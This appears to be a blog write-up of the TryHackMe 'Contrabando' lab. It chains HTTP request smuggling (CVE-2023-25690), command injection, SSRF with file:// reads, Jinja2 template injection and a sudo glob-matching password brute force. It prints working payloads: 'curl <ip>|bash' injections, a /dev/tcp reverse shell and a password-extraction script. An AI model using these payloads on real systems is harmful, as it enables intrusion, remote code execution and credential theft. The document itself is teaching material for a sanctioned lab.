ShadowV0id

Contrabando Tryhackme Writeup

Wed, 20 Aug 2025 00:00:00 GMT

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>  <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-6730116050408303" data-ad-slot="6226039483" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script>

IP

10.201.63.47

RECON

$ nmap -T4 -n -sC -sV -Pn -p- 10.201.63.47
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 41:ed:cf:46:58:c8:5d:41:04:0a:32:a0:10:4a:83:3b (RSA)
|   256 e8:f9:24:5b:e4:b0:37:4f:00:9d:5c:d3:fb:54:65:0a (ECDSA)
|_  256 57:fd:4a:1b:12:ac:7c:90:80:88:b8:5a:5b:78:30:79 (ED25519)
80/tcp open  http    Apache httpd 2.4.55 ((Unix))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.55 (Unix)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ports Open

There are two ports open:

22 (SSH)
80 (HTTP)

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

Web 80

Upon accessing http://10.201.63.47/, the site presents a static Coming Soon page, which includes a navigational link directing users to /page/home.html.

Navigating to http://10.201.63.47/page/home.html displays only a message indicating that the password generator is currently unavailable, with no additional content present.

A notable observation, which may prove relevant later, is that the response headers reveal the presence of two distinct Apache2 servers.

1. http://10.201.63.47/

In home page it was running on Server:

Apache/2.4.55 (Unix)
1. http://10.201.63.47/page/home.html

In /page/home.html it was running on Server:

Apache/2.4.54 (Debian)

X-Powered-By:

PHP/7.4.33

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

Foothold

Web Application Analysis

Initial fuzzing of the webroot did not yield any notable results. However, targeting the /page/ endpoint for potential files revealed an unusual behavior: all responses consistently returned a 200 OK status.

┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -u 'http://10.201.63.47/page/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -mc all -t 100 -ic -fc 404 -e .php,/
...
09.php                  [Status: 200, Size: 148, Words: 19, Lines: 3, Duration: 129ms]
09                      [Status: 200, Size: 144, Words: 19, Lines: 3, Duration: 137ms]
images.php              [Status: 200, Size: 152, Words: 19, Lines: 3, Duration: 112ms]
...

Upon inspecting one of these responses, a peculiar behavior is observed: any input provided after /page/ in the URL appears to be directly passed to the readfile() function within /var/www/html/index.php.

Bypassing a test string and providing the path to a valid file (using double URL encoding) confirms that the readfile() function successfully retrieves the file contents, allowing arbitrary file reads. Furthermore, leveraging wrappers such as http:// enables external requests to be made and their responses read, exposing a Server-Side Request Forgery (SSRF) vulnerability.

Let see /etc/passwd

:::note we should encode this becoz dangerous string, may be blocked. after encode you will get %252Fetc%252Fpasswd :::

Exploiting this vulnerability for reconnaissance and making targeted requests reveals that the application is running within a Docker container. Apart from noting that the Apache2 server is listening on *:8080 via its configuration, there is little of immediate value.

Resuming fuzzing of the /page/ endpoint, this time with the -fw 19 option to ignore readfile() errors, uncovers two noteworthy files: index.php and gen.php.

┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -u 'http://10.201.63.47/page/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -mc all -t 100 -ic -fc 404 -e .php,/ -fw 19
...
index.php               [Status: 200, Size: 148, Words: 17, Lines: 11, Duration: 135ms]
gen.php                 [Status: 200, Size: 392, Words: 65, Lines: 15, Duration: 127ms]

Analysis of /page/gen.php reveals a straightforward PHP script that accepts a length parameter via POST and forwards it directly to the exec() function, introducing a command injection vulnerability.

Reviewing /page/index.php confirms that this script underlies the file read and request functionality. It extracts the page parameter from the GET request and passes it directly to readfile(). Interestingly, requests to /page/* are still processed successfully, despite the script being designed to accept the parameter explicitly via a GET variable.

Request Tunneling

At this stage, the available findings suggest that the application relies on a two-tier setup. The frontend Apache2 server intercepts requests and, when the URL begins with /page/, it extracts the subsequent content and proxies the request to a backend Apache2 instance. This backend hosts index.php and gen.php, with the proxied request taking the form: http://backend:8080/index.php?page=* This mechanism prevents direct access to gen.php on the backend.

Despite this restriction, index.php remains accessible, allowing the readfile() function to be invoked with arbitrary input. Leveraging this, it is possible to request backend resources such as http://127.0.0.1:8080/gen.php. However, the readfile() function only issues GET requests, limiting interaction with gen.php to retrieval only. Since exploiting the command injection vulnerability in gen.php requires a POST request, this creates a barrier to direct exploitation.

encoded : http%253a%252f%252f127.0.0.1%253a8080%252fgen.php

Investigating how the proxying behavior may be configured in Apache2 suggests that it is likely implemented using mod_proxy, with a configuration resembling the following:

ProxyPass "/page/" "http://backend:8080/"
ProxyPassReverse "/page/" "http://backend:8080/"

HTTP Request Smuggling via mod_proxy (CVE-2023-25690)

Recon indicates a front-end Apache HTTP Server (mod_proxy) forwarding paths beginning with /page/ to a back-end Apache instance. The proxy constructs target URLs as:

http://backend:8080/index.php?page=<suffix> In Apache 2.4.55, a configuration like this is vulnerable to CRLF injection CVE-2023-25690, enabling HTTP request smuggling.

Observed Behavior

Input appended after /page/ is reflected in the back-end request line processed by index.php.
CRLF characters (\r\n) can be injected to make the back end interpret a single front-end request as multiple requests.

Example (sanitized): Front-end request:

GET /page/test HTTP/1.1
Host: 10.201.92.207

Back-end receives:

GET /index.php?page=test HTTP/1.1
Host: backend

With CRLF injection (illustrative):

GET /page/test%0D%0AHost:%20localhost%0D%0A%0D%0AGET%20/smuggled HTTP/1.1
Host: 10.201.92.207

Back-end interprets as two requests:

GET /index.php?page=test HTTP/1.1
Host: localhost

GET /smuggled HTTP/1.1
Host: backend

Impact

The back-end gen.php can be reached via a smuggled POST request, enabling command injection if input is unsafely passed to exec().
This provides a potential remote code execution vector within the container.

Sanitized smuggled POST illustration:

POST /gen.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

length=<user_input>

Conditions Required

Apache 2.4.55 (or similar vulnerable version) with mod_proxy path rewriting.
Back-end endpoint reachable only via the proxy and unsafe input handling.
CRLF not blocked at the front end.

Remediation

Upgrade Apache to a patched version.
Harden proxy rules: avoid concatenating untrusted path segments.
Sanitize inputs in all back-end scripts (remove exec, validate parameters).
Block CR/LF in URLs or headers.
Enforce access controls to sensitive back-end endpoints.
Monitor for unusual multi-request sequences via WAF/IDS.
Risk Rating: High (exploitation could lead to full container compromise).

Example Diagram :

+----------------+        /page/ request         +----------------+
| Front-end      |-----------------------------> | Back-end       |
| Apache2        |                                 Apache2         |
| (10.201.92.207) |                                 (127.0.0.1:8080)|
+----------------+                                 +----------------+
       |                                                  |
       | GET /page/test                                   |
       |------------------------------------------------->|
       |                                                  |
       |                                      GET /index.php?page=test
       |                                      Host: backend
       |                                                  |
       | CRLF injection:                                  |
       | test%0D%0AHost: localhost%0D%0A%0D%0AGET /smuggled |
       |------------------------------------------------->|
       |                                                  |
       |                                GET /index.php?page=test
       |                                Host: localhost
       |                                                  |
       |                                GET /smuggled HTTP/1.1
       |                                Host: backend
       |                                                  |
       +--------------------------------------------------+

lets use this payload :

test HTTP/1.1
Host: localhost

POST /gen.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

length=;curl 10.14.xxx.xx|bash;

GET /test

encoded as :

test%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A%0D%0APOST%20/gen.php%20HTTP/1.1%0D%0AHost:%20localhost%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2031%0D%0A%0D%0Alength=;curl%20<ip>%7Cbash;%0D%0A%0D%0AGET%20/test

reverse shell payload on our web server:

┌──(kali㉿kali)-[~/Desktop]
└─$ cat index.html 
/bin/bash -i >& /dev/tcp/10.4.19.136/443 0>&1                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

now lets inject our payload and we got a web shell

Shell as hansolo – Network Scanning

After gaining a foothold, the container’s IP is identified as 172.18.0.3. Performing a network scan from within the container using RustScan reveals an unusual open port on the host machine at 172.18.0.1:5000. This indicates a potential service on the host that may be reachable from the container and warrants further enumeration.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.4.19.136] from (UNKNOWN) [10.201.92.207] 37618
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@124a042cc76c:/var/www/html$ script -qc /bin/bash /dev/null
script -qc /bin/bash /dev/null
www-data@124a042cc76c:/var/www/html$ ^Z
zsh: suspended  nc -lvnp 443
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443

www-data@124a042cc76c:/var/www/html$ export TERM=xterm
www-data@124a042cc76c:/var/www/html$ hostname -i
172.18.0.3
www-data@124a042cc76c:/tmp$ curl -s http://<ip>/rustscan -o rustscan
www-data@124a042cc76c:/tmp$ chmod +x rustscan
www-data@124a042cc76c:/tmp$ ./rustscan --top -a 172.18.0.1,172.18.0.2 --accessible
Open 172.18.0.1:22
Open 172.18.0.1:80
Open 172.18.0.2:80
Open 172.18.0.1:5000

Server-Side Request Forgery (SSRF)

Accessing http://172.18.0.1:5000/ from the container using curl reveals a web interface containing a form that accepts URLs via POST requests. This indicates the host is performing server-side requests on behalf of user-supplied input, presenting a potential SSRF attack vector.

www-data@124a042cc76c:/var/www/html$ curl -s http://172.18.0.1:5000/
<!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>

    </div>
</body>
</html>

:::note Testing it with a request and giving the URL for our own machine:

www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=http://10.4.19.136/'  http://172.18.0.1:5000/

                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.4.19.136] from (UNKNOWN) [10.201.92.207] 33826
GET / HTTP/1.1
Host: 10.4.19.136
User-Agent: PycURL/7.45.2 libcurl/7.68.0 OpenSSL/1.1.1f zlib/1.2.11 brotli/1.0.7 libidn2/2.2.0 libpsl/0.21.0 (+libidn2/2.2.0) libssh/0.9.3/openssl/zlib nghttp2/1.40.0 librtmp/2.3
Accept: */*

:::

Testing further, we can confirm it not only makes the request but also displays the response it receives.

┌──(kali㉿kali)-[~/Desktop]
└─$ echo 'PWNCRAFTS' > test.txt
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.201.92.207 - - [21/Aug/2025 02:02:19] "GET /test.txt HTTP/1.1" 200 -

www-data@124a042cc76c:/var/www/html$  curl -s -d 'website_url=http://10.4.19.136/test.txt'  http://172.18.0.1:5000/

        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        PWNCRAFTS

    </div>
</body>
</html>www-data@124a042cc76c:/var/www/html$

The service uses PycURL, which supports the file:// protocol. This allows local file access on the host. Using this mechanism to read /etc/passwd confirms the presence of the hansolo user as well as the root account, indicating potential targets for privilege escalation.

curl -s -d 'website_url=file:///etc/passwd' http://172.18.0.1:5000/

www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///etc/passwd'
curl: no URL specified!cc76c:/var/www/html$ curl -s -d 'website_url=file:///etc/passwd' 
curl: try 'curl --help' or 'curl --manual' for more information
 http://172.18.0.1:5000/ar/www/html$ curl -s -d 'website_url=file:///etc/passwd' 

        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
hansolo:x:1000:1000::/home/hansolo:/bin/bash

    </div>
</body>
</html>www-data@124a042cc76c:/var/www/html$

we have user : hansolo

Inspecting /proc/self/status reveals that the application process is running under the hansolo user account. This confirms the current privilege level within the container.

curl -s -d 'website_url=file:///proc/self/status' http://172.18.0.1:5000/

www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///proc/self/status' http://172.18.0.1:5000/ 

        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        Name:   python3
Umask:  0002
State:  S (sleeping)
Tgid:   726
Ngid:   0
Pid:    726
PPid:   725
TracerPid:      0
Uid:    1000    1000    1000    1000
Gid:    1000    1000    1000    1000
FDSize: 64
Groups: 1000 
NStgid: 726
NSpid:  726
NSpgid: 725
NSsid:  725
VmPeak:   189028 kB
VmSize:   124112 kB
VmLck:         0 kB
VmPin:         0 kB
VmHWM:     36440 kB
VmRSS:     36436 kB
RssAnon:           20856 kB
RssFile:           15580 kB
RssShmem:              0 kB
VmData:    38372 kB
VmStk:       132 kB
VmExe:      2644 kB
VmLib:     12288 kB
VmPTE:       144 kB
VmSwap:        0 kB
HugetlbPages:          0 kB
CoreDumping:    0
THP_enabled:    1
Threads:        2
SigQ:   0/15197
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000001001000
SigCgt: 0000000180000002
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0
Seccomp_filters:        0
Speculation_Store_Bypass:       vulnerable
SpeculationIndirectBranch:      always enabled
Cpus_allowed:   3
Cpus_allowed_list:      0-1
Mems_allowed:   00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
Mems_allowed_list:      0
voluntary_ctxt_switches:        6378
nonvoluntary_ctxt_switches:     55

    </div>
</body>
</html>www-data@124a042cc76c:/var/www/html$

After initial attempts to access sensitive files like SSH keys prove unfruitful, the next step is to analyze the application’s source code to understand its functionality. The executable path can be retrieved from /proc/self/cmdline, providing a starting point for source code enumeration.

Clear Diagram

          ┌───────────────────────┐
          │  Web App /gen.php     │
          │  running inside       │
          │  container            │
          └─────────┬─────────────┘
                    │
         Sends a request with:
         website_url=file:///proc/self/status
                    │
                    ▼
          ┌───────────────────────┐
          │ Linux Kernel exposes  │
          │ process info under    │
          │ /proc/self/           │
          └─────────┬─────────────┘
                    │
   /proc/self/status contains:
   ┌─────────────────────────────┐
   │ Name:   python3              │
   │ State:  S (sleeping)         │
   │ Pid:    726                  │
   │ PPid:   725                  │
   │ Uid:    1000    1000 1000 1000 │  ← Key info
   │ Gid:    1000    1000 1000 1000 │
   └─────────────────────────────┘
                    │
   Kernel returns content to web app
                    │
                    ▼
          ┌───────────────────────┐
          │ Output displayed by  │
          │ web app to attacker  │
          └─────────┬─────────────┘
                    │
     Attacker reads the **Uid** value:
       1000 → maps to user `hansolo` in /etc/passwd
                    │
                    ▼
           ┌─────────────────────┐
           │ Attacker now knows  │
           │ the process runs as │
           │ user hansolo        │
           └─────────────────────┘

www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///proc/self/cmdline' http://172.18.0.1:5000/ -o-


        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        /usr/bin/python3/home/hansolo/app/app.py
    </div>
</body>
</html>www-data@124a042cc76c:/var/www/html$

Now, lets read /home/hansolo/app/app.py source code.

www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=file:///home/hansolo/app/app.py' http://172.18.0.1:5000/

        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        from flask import Flask, render_template, render_template_string, request
import pycurl
from io import BytesIO

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def display_website():
    if request.method == 'POST':
        website_url = request.form['website_url']

        # Use pycurl to fetch the content of the website
        buffer = BytesIO()
        c = pycurl.Curl()
        c.setopt(c.URL, website_url)
        c.setopt(c.WRITEDATA, buffer)
        c.perform()
        c.close()

        # Extract the content and convert it to a string
        content = buffer.getvalue().decode('utf-8')
        buffer.close()
        website_content = '''
        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        %s
    </div>
</body>
</html>'''%content

        return render_template_string(website_content)

    return render_template('index.html')

if __name__ == '__main__':
    app.run(host="0.0.0.0",debug=False)

    </div>
</body>
</html>www-data@124a042cc76c:/var/www/html$


# /home/hansolo/app/app.py

from flask import Flask, render_template, render_template_string, request
import pycurl
from io import BytesIO

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def display_website():
    if request.method == 'POST':
        website_url = request.form['website_url']

        # Use pycurl to fetch the content of the website
        buffer = BytesIO()
        c = pycurl.Curl()
        c.setopt(c.URL, website_url)
        c.setopt(c.WRITEDATA, buffer)
        c.perform()
        c.close()

        # Extract the content and convert it to a string
        content = buffer.getvalue().decode('utf-8')
        buffer.close()
        website_content = '''
        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        %s
    </div>
</body>
</html>'''%content

        return render_template_string(website_content)

    return render_template('index.html')

if __name__ == '__main__':
    app.run(host="0.0.0.0",debug=False)

Server-Side Template Injection (SSTI)

Analysis of the source code reveals a simple Flask application. On a POST request:

The application retrieves a URL from the website_url parameter.
It fetches the content of that URL using PycURL.
The fetched content is assigned to website_content and passed directly to render_template_string.

Vulnerability:

User-controlled URLs allow an attacker to inject arbitrary content into website_content.
Because this content is processed by Jinja2 through render_template_string, an attacker can achieve Server-Side Template Injection (SSTI).

Illustrative Example:

If an attacker hosts a file containing a malicious Jinja2 template, submitting its URL via the website_url parameter would cause the template to be rendered on the server, executing arbitrary template code.

┌──(kali㉿kali)-[~/Desktop]
└─$ cat template 
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.4.19.136|bash').read() }}
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$

When we make the site fetch it, the response would be a template that would be formatted into the HTML code present in the application code and would get passed to render_template_string and executed.

www-data@124a042cc76c:/var/www/html$ curl -s -d 'website_url=http://10.4.19.136/template'  http://172.18.0.1:5000/

        <!DOCTYPE html>
<html>
<head>
    <title>Website Display</title>
</head>
<body>
    <h1>Fetch Website Content</h1>
    <h2>Currently in Development</h2>
    <form method="POST">
        <label for="website_url">Enter Website URL:</label>
        <input type="text" name="website_url" id="website_url" required>
        <button type="submit">Fetch Website</button>
    </form>
    <div>
        

    </div>
</body>
</html>www-data@124a042cc76c:/var/www/html$

now lets turn on listener and execute the same cmd curl -s -d 'website_url=http://10.4.19.136/template' http://172.18.0.1:5000/, we obtain a shell as the hansolo user and can read the first flag.

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 443                
listening on [any] 443 ...
connect to [10.4.19.136] from (UNKNOWN) [10.201.92.207] 54278
bash: cannot set terminal process group (725): Inappropriate ioctl for device
bash: no job control in this shell
hansolo@contrabando:~$ python3 -c 'import pty;pty.spawn("/bin/bash");'
python3 -c 'import pty;pty.spawn("/bin/bash");'
hansolo@contrabando:~$ export TERM=xterm
export TERM=xterm
hansolo@contrabando:~$ ^Z
zsh: suspended  nc -lvnp 443
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443

hansolo@contrabando:~$ ls
app  hansolo_userflag.txt
hansolo@contrabando:~$ cat hansolo_userflag.txt
THM{Th3_BeST_xxxx_xxx_xxxxxxx
hansolo@contrabando:~$

Shell as root – Sudo Privileges

Examining the sudo capabilities for the hansolo user reveals two commands executable as root without providing the user’s password:

hansolo@contrabando:~$ sudo -l
Matching Defaults entries for hansolo on contrabando:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hansolo may run the following commands on contrabando:
    (root) NOPASSWD: /usr/bin/bash /usr/bin/vault
    (root) /usr/bin/python* /opt/generator/app.py

/usr/bin/bash /usr/bin/vault – can be executed directly as root.
/usr/bin/python* /opt/generator/app.py – requires knowledge of the hansolo user password to run as root.

Brute-Forcing the Password

To execute the second root-level command (/usr/bin/python* /opt/generator/app.py), the hansolo user password is required. Before attempting brute force, we first examine the /usr/bin/vault script, which can be executed as root without a password, to identify potential hints or mechanisms that could reveal or assist in obtaining the password.

hansolo@contrabando:~$ cat /usr/bin/vault
#!/bin/bash

check () {
        if [ ! -e "$file_to_check" ]; then
            /usr/bin/echo "File does not exist."
            exit 1
        fi
        compare
}


compare () {
        content=$(/usr/bin/cat "$file_to_check")

        read -s -p "Enter the required input: " user_input

        if [[ $content == $user_input ]]; then
            /usr/bin/echo ""
            /usr/bin/echo "Password matched!"
            /usr/bin/cat "$file_to_print"
        else
            /usr/bin/echo "Password does not match!"
        fi
}

file_to_check="/root/password"
file_to_print="/root/secrets"

check
hansolo@contrabando:~$

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

we have /usr/bin/vault

# /usr/bin/vault
#!/bin/bash

check () {
        if [ ! -e "$file_to_check" ]; then
            /usr/bin/echo "File does not exist."
            exit 1
        fi
        compare
}


compare () {
        content=$(/usr/bin/cat "$file_to_check")

        read -s -p "Enter the required input: " user_input

        if [[ $content == $user_input ]]; then
            /usr/bin/echo ""
            /usr/bin/echo "Password matched!"
            /usr/bin/cat "$file_to_print"
        else
            /usr/bin/echo "Password does not match!"
        fi
}

file_to_check="/root/password"
file_to_print="/root/secrets"

check

Looking at the script, we can see a vulnerability in the if [[ $content == $user_input ]]; then line, as the $user_input parameter which is read from the user is not quoted. This allows us to use glob matching in the comparison as such:

$ user_input="*"; if [[ "password" == "$user_input" ]]; then echo "TRUE"; else echo "FALSE"; fi
FALSE

$ user_input="*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
TRUE

Exploiting this by entering * as our input, we are able to bypass the check and access the contents of /root/secrets, though it provides no useful information.

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

hansolo@contrabando:~$ sudo /usr/bin/bash /usr/bin/vault
Enter the required input: *
Password matched!
1. Lightsaber Colors: Lightsabers in Star Wars can come in various colors, and the color often signifies the Jedi's role or affiliation. For example, blue and green lightsabers are commonly associated with Jedi Knights, while red lightsabers are typically used by Sith. However, there are exceptions, and the color can also represent other factors.

2. Darth Vader's Breathing: The iconic sound of Darth Vader's breathing was created by sound designer Ben Burtt. He achieved this effect by recording himself breathing through a scuba regulator. The sound became one of the most recognizable and menacing elements of the character.

3. Ewok Language: The Ewoks, the small furry creatures from the forest moon of Endor in "Return of the Jedi," speak a language called Ewokese. The language is a combination of various Tibetan, Nepalese, and Kalmyk phrases, as well as some manipulated dialogue from the Quechua language.

4. Han Solo's Carbonite Freeze: In "Star Wars: Episode V - The Empire Strikes Back," Han Solo is frozen in carbonite. The famous line, "I love you," "I know," was actually improvised by Harrison Ford. The original script had Han responding with "I love you too," but Ford felt that Han's character wouldn't say that, so he ad-libbed the now-famous line.

5. Yoda's Species and Name: Yoda's species and homeworld are never revealed in the Star Wars films, and George Lucas has been adamant about keeping this information a mystery. Additionally, the name "Yoda" was chosen simply because George Lucas liked the sound of it.
hansolo@contrabando:~$

Rather than merely bypassing the check, the script’s glob pattern matching can be leveraged to brute-force the value of the $content parameter, which is read from /root/password. By iterating over possible characters, prepending each to a wildcard (*), and observing the script’s behavior, it is possible to progressively reconstruct the password.

example :

for char in charset:
    test_pattern = char + '*'
    run vault script with $content = test_pattern
    if script behaves as expected:
        append char to known_password

$ user_input="a*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
FALSE
...

$ user_input="p*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
TRUE
...

$ user_input="pab*"; if [[ "password" == $user_input ]]; then echo "TRUE"; else echo "FALSE"; fi
FALSE
...

We can automate this process with a Python script that loops through all characters prepended to * and checks if the output from the script includes Password matched!. If it does, we know we have discovered a character from the beginning of the password and can move on to the next character.

<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6730116050408303" crossorigin="anonymous"></script>

hansolo@contrabando:~$ nano password_find.py
hansolo@contrabando:~$ cat password_find.py
import subprocess
import string

charset = string.ascii_letters + string.digits
password = ""

while True:
    found = False
    for char in charset:
        attempt = password + char + "*"
        print(f"\r[+] Password: {password+char}", end="")
        proc = subprocess.Popen(
            ["sudo", "/usr/bin/bash", "/usr/bin/vault"],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True
        )
        stdout, stderr = proc.communicate(input=attempt + "\n")
        if "Password matched!" in stdout:
            password += char
            found = True
            break
    if not found:
        break

print(f"\r[+] Final Password: {password}")
hansolo@contrabando:~$

script

# password_find.py
import subprocess
import string

charset = string.ascii_letters + string.digits
password = ""

while True:
    found = False
    for char in charset:
        attempt = password + char + "*"
        print(f"\r[+] Password: {password+char}", end="")
        proc = subprocess.Popen(
            ["sudo", "/usr/bin/bash", "/usr/bin/vault"],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
